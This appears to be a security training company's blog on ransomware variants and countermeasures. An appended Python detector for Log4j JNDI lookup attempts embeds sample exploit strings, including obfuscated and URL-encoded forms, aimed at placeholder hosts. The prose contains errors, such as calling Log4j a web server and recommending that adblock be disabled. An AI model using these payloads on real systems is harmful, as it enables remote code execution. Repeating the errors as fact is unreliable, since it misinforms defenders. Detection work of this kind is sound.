Uploaded on Mar 17, 2022
Ransomware has been the most significant threat for years; it has affected many sectors and remains one of the top risks. The topics covered in the webinar are detailed in this blog for reference.
Ransomware- A Reality Check (Part 2)
www.infosectrain.com | [email protected]
Variants of Ransomware
Bad Rabbit: It was distributed through a fake Adobe Flash update on a compromised website. Once the fake update is downloaded, your data is compromised.
CryptoWall: The malware hides in zip files and other email attachments, and then it makes its way to your devices. Once you install them, it tries to find Java vulnerabilities to encrypt or withhold your data.
Petya: It is a crypto-ransomware that targets your Windows servers, laptops, or PCs. It mostly takes advantage of SMB (Server Message Block), tries to steal your credentials, and spreads into your machine.
WannaCry: It was first seen in a large-scale crypto-ransomware attack in 2017. It affected almost a quarter-million machines internationally, and it spreads through the Windows operating system.
BlackByte: It is a notorious variant that compromised multiple US and foreign businesses, including three critical US infrastructure sectors. It encrypts your files and compromises the Windows host system, including physical and virtual servers.
Countermeasures
The following are the countermeasures or defense mechanisms to be implemented to ensure
safe data transfer:
Using the firewall to its fullest capability
Firewalls are the most reliable. If a firewall blocks malicious web requests, or an email security gateway has been implemented, users will not receive those malicious requests or emails. But if the firewall fails, there should be backup plans.
Log4j attack: The Log4j vulnerability, an Apache web server, has been exploited in the wild, starting with games and moving from exploiting the game servers to the actual corporate servers.
User Education
For example, if an email passes through an email security gateway and firewall, and the user is unaware of potential phishing emails, the attack surface grows.
Kevin Mitnick, the most notorious hacker, started with phishing over the telephone, and the FBI searched for him extensively. A company called KnowBe4 offers training that makes users aware of phishing and how to identify emails received from a suspicious sender.
Disabling Macros execution
Macro execution is a popular way for people to get exploited. For example, a malicious document is attached to an email, and the user who receives it is unaware and thinks it is legitimate. He then opens the document, and the macros get enabled inside the organization if he is using the organization's network.
Macros are small code blocks that get executed automatically in the background, primarily in Office applications, where they are based on Visual Basic. This code is written to exploit any existing vulnerabilities in the computers.
Implement Web security
Cross-site scripting attack: Suppose your browser is vulnerable to a particular attack. These types of browser vulnerabilities are exploited when you visit a malicious website.
The website of the well-known chef Jamie Oliver was vulnerable, and everyone visiting it downloaded malicious code in the background. To overcome such malicious code, every organization should implement WAF rules and disable adblock.
Incorporate least privilege policy
Rule-based access control and backups are most important. Giving people only the privileged access they need to perform their activity, not full access, is part of a defense-in-depth strategy.
Network Segmentation
The HR department receives more external emails with documents or PDF files than the software development department does. Do you think both should work on the same network if the goal is high security?
If HR receives a malicious email and clicks, the malware starts spreading in the environment. For example, Wipro was part of the MSSP attack. A supply chain attack took hold because some other team had clicked a URL that let people into the network. If they had segmented their network, they would have prevented it.
Active monitoring
Security analysts in the Security Operations Center (SOC) monitor alerts 24/7. They look to identify attacks and modify the defenses. For example, when they saw 3,000 Log4j exploitation attempts, they implemented alerts and security measures to block the attempts and notify us. That helps to take further steps and investigate the particular source or IP address.
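The monitoring step described above, as an added example (not InfosecTrain's code): a Python detector that flags Log4j JNDI lookup strings in web access logs, including URL-encoded and nested-lookup forms, and counts them per source IP. The log lines, IP addresses, host names and alert threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [ts] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.7 - - [ts] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl"',
    '203.0.113.7 - - [ts] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:dns://example.invalid}"',
    '198.51.100.20 - - [ts] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [ts] "GET /search?q=jndi+tutorial HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [ts] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/b}"',
]

# Nested lookups that hide the keyword: ${lower:x}, ${upper:x}, ${a:b:-x}, ${::-x}
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}:]*:[^${}:]*:-([^${}]*)\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)
_SRC_IP = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def normalize(text):
    """URL-decode (twice, to catch double encoding) and unwrap nested lookups."""
    for _ in range(2):
        text = unquote(text)
    prev = None
    while prev != text:  # repeat until no nested lookup is left to unwrap
        prev = text
        text = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def is_log4j_attempt(line):
    """True if the normalized line contains a JNDI lookup expression."""
    return bool(_JNDI.search(normalize(line)))


def alerts(lines, threshold=3):
    """Return {source_ip: attempts} for sources at or above the threshold."""
    hits = Counter()
    for line in lines:
        m = _SRC_IP.match(line)
        if m and is_log4j_attempt(line):
            hits[m.group(1)] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}
```

Sources returned by `alerts` are the ones to block and investigate; a single hit, such as the one from 192.0.2.44 here, stays below the default threshold but is still visible with `threshold=1`.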
Action Plan
It’s not about how you will be attacked; it’s about when you will be attacked. Even
organizations with high security are compromised, and an Action plan helps in this
case.
A clear and detailed action plan of what to do and how to do it when an attack occurs includes the most practical and effective countermeasures to implement quickly.
About InfosecTrain
• Established in 2016, we are one of the finest Security and Technology Training and Consulting companies
• Wide range of professional training programs, certifications & consulting services in the IT and Cyber Security domain
• High-quality technical services, certifications or customized training programs curated with professionals of over 15 years of combined experience in the domain
Why InfosecTrain
• Global Learning Partners
• Certified and Experienced Instructors
• Flexible modes of Training
• Access to the recorded sessions
• Post training completion
• Tailor Made Training
Contact us
Get your workforce reskilled
by our certified and
experienced instructors!
IND: 1800-843-7890 (Toll Free) / US: +1 657-221-1127 / UK: +44 7451 208413
[email protected]
www.infosectrain.com